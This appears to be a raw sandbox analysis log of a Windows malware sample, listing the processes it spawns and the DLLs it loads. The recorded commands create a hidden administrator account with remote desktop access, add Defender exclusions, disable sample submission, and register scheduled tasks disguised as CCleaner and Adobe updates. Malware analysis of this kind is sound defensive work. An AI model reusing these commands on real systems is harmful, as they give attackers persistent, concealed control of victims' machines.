Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\400.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\939.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll"
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll" /tn "CCleaner Update79"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /Create /XML "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll" /tn "CCleaner Update79"
Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\UeNuQ\578.vbs" fsUIwEqMAc zyTFxcsIkA "C:\Users\user\AppData\Roaming\UeNuQ\BACCrSAh.bat"
Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\UeNuQ\939.vbs"
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Roaming\UeNuQ\UILIklkzCJ.bat fsUIwEqMAc zyTFxcsIkA"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic group where sid="S-1-5-32-544" get name /value
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\UeNuQ\BACCrSAh.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic group where sid="S-1-5-32-544" get name /value
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic group where sid="S-1-5-32-555" get name /value
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Program Files\RDP Wrapper\rdpwrap.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\fsutil.exe fsutil dirty query C:
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net user fsUIwEqMAc zyTFxcsIkA /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user fsUIwEqMAc zyTFxcsIkA /add
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup Administrators fsUIwEqMAc /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup Administrators fsUIwEqMAc /add
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic group where sid="S-1-5-32-555" get name /value
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup "Remote Desktop Users" fsUIwEqMAc /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Remote Desktop Users" fsUIwEqMAc /add
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net accounts /maxpwage:unlimited
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 accounts /maxpwage:unlimited
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v fsUIwEqMAc /t REG_DWORD /d "00000000" /f
Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Process created: C:\Windows\SysWOW64\makecab.exe "C:\Windows\System32\makecab.exe"	Jump to behavior
Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c WEHuzypTIfJLQWpZ & HMYPflMZogRtPmKziXCRecxqxWV & rIgSHQwdwGHxUulRaOS & cmd < Adunazione.aiff	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^PDJplZmnTgtAyDiuBpyEpVkwfrgXvSPrnafATkwmhgkjZWXWVrVrLcJTaHUuLBwqmqeNgGhdiGdVJYwauseaWLaeJcoksUNMjkNZUpIfQEVtyOpzFBqzmJrNHqrSnwZhSEInkenWINBs$" Raccontero.aiff	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com Rifiutare.exe.com D	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^PDJplZmnTgtAyDiuBpyEpVkwfrgXvSPrnafATkwmhgkjZWXWVrVrLcJTaHUuLBwqmqeNgGhdiGdVJYwauseaWLaeJcoksUNMjkNZUpIfQEVtyOpzFBqzmJrNHqrSnwZhSEInkenWINBs$" Raccontero.aiff	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com Uno.exe.com f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^PDJplZmnTgtAyDiuBpyEpVkwfrgXvSPrnafATkwmhgkjZWXWVrVrLcJTaHUuLBwqmqeNgGhdiGdVJYwauseaWLaeJcoksUNMjkNZUpIfQEVtyOpzFBqzmJrNHqrSnwZhSEInkenWINBs$" Raccontero.aiff	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com Inebriato.exe.com R	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Process created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com D	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Process created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Process created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com f	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com	Process created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Process created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com R	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com	Process created: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath ""$env:ProgramFiles"""
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath ""$env:Appdata"""
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend"
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe""
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\1186.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\939.vbs
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\54.vbs" fsUIwEqMAc zyTFxcsIkA "C:\Users\user\AppData\Roaming\UeNuQ\578.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\BACCrSAh.bat" "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll"
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll" /tn "Adobe Acrobat Update Task53"
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\400.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\939.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll"
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll" /tn "CCleaner Update79"
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Roaming\UeNuQ\UILIklkzCJ.bat fsUIwEqMAc zyTFxcsIkA"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath ""$env:ProgramFiles""
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath ""$env:Appdata""
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\1186.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\939.vbs
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\54.vbs" fsUIwEqMAc zyTFxcsIkA "C:\Users\user\AppData\Roaming\UeNuQ\578.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\BACCrSAh.bat" "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /Create /XML "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll" /tn "Adobe Acrobat Update Task53"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\400.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\939.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /Create /XML "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll" /tn "CCleaner Update79"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\UeNuQ\BACCrSAh.bat
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Program Files\RDP Wrapper\rdpwrap.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net user fsUIwEqMAc zyTFxcsIkA /add
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup Administrators fsUIwEqMAc /add
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup "Remote Desktop Users" fsUIwEqMAc /add
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net accounts /maxpwage:unlimited
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v fsUIwEqMAc /t REG_DWORD /d "00000000" /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic group where sid="S-1-5-32-544" get name /value
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic group where sid="S-1-5-32-544" get name /value
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic group where sid="S-1-5-32-555" get name /value
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\fsutil.exe fsutil dirty query C:
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user fsUIwEqMAc zyTFxcsIkA /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup Administrators fsUIwEqMAc /add
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic group where sid="S-1-5-32-555" get name /value
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Remote Desktop Users" fsUIwEqMAc /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 accounts /maxpwage:unlimited

Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\8lOT1rXZp5.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\makecab.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.com	Section loaded: iphlpapi.dll	Jump to behavior
